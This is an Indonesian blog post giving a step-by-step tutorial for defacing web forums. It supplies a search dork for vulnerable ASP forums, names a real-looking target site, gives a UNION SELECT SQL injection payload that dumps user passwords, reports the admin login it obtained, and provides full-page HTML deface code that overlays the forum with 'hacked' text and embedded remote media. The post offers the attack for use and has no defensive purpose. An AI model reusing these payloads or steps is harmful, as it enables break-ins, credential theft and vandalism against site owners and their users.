Sabtu, 23 Maret 2013

Cara Deface Forum

dorknya
inurl:/forums.asp?iFor=
Pilih target...
Contoh target
http://www.portugalweb.net/forum/forums.asp?iFor=23
Hapus angka dibelakang =
Hingga menjadi ini
http://www.portugalweb.net/forum/forums.asp?iFor=
Setelah = masukan SQL inject
12+union+select+1,2,3,u_password,5,u_id,7,8,9,10,11,12+from+users
Hingga menjadi seperti ini
http://www.portugalweb.net/forum/forums ... from+users
Tulisan yg berderet di bawah nama 10 TOPICS itu adalah username
Tulisan yg berderet di bawah nama DATED itu adalah passwordnya
Cari username admin & passnya.
Ok..pada web target yg jadi bahan tutor ini saya menemukan username & password
Username : admin
Password : default
Sekarang klik tulisan login yg berada diatas.
Nah..login udah berhasil
Sekarang jika ingin melakukan defacing, klik tulisan "POST NEW TOPICS"
Isi Subject nya...
Contoh : HACKED BY BLA BLA BLA
lalu masukin script deface HTML nya ke kolom di bawah subject.
Hmm......
Jika ingin menutup full seluruh halaman, pake code berikut
<DIV align=center><DIV id=Layer1 style="BORDER-RIGHT: #000000 1px; BORDER-TOP: #000000 1px; Z-INDEX: 1; LEFT: 0px; BORDER-LEFT: black 1px; WIDTH: 1300px; BORDER-BOTTOM: black 1px; POSITION: absolute; TOP: 0px; HEIGHT: 7000px; BACKGROUND-COLOR: black; layer-background-color: black"><center>
<br><b><font face="papyrus" color="red" size="5">Nggodress Was Here</font></h2><br><br><img src="http://img526.imageshack.us/img526/2889/120208172927.png" ><br><br>
<font face="papyrus" color="red" size="5">Greetz To All Defacer</a><br><br>
<font face="papyrus" color="red" size="5">Sssssttt!!! nampang dulu bosss :P </font><br><br><font color="red" size="3">Nggodress
<embed src="http://divine-music.info/musicfiles/Avenged%20Sevenfold%20-%20Dear%20God.swf" autoplay="true" hidden="true"></embed>
</DIV>
edit sendiri kakak :)

Posting Lebih Baru Posting Lama Beranda

0 Komentar:

Posting Komentar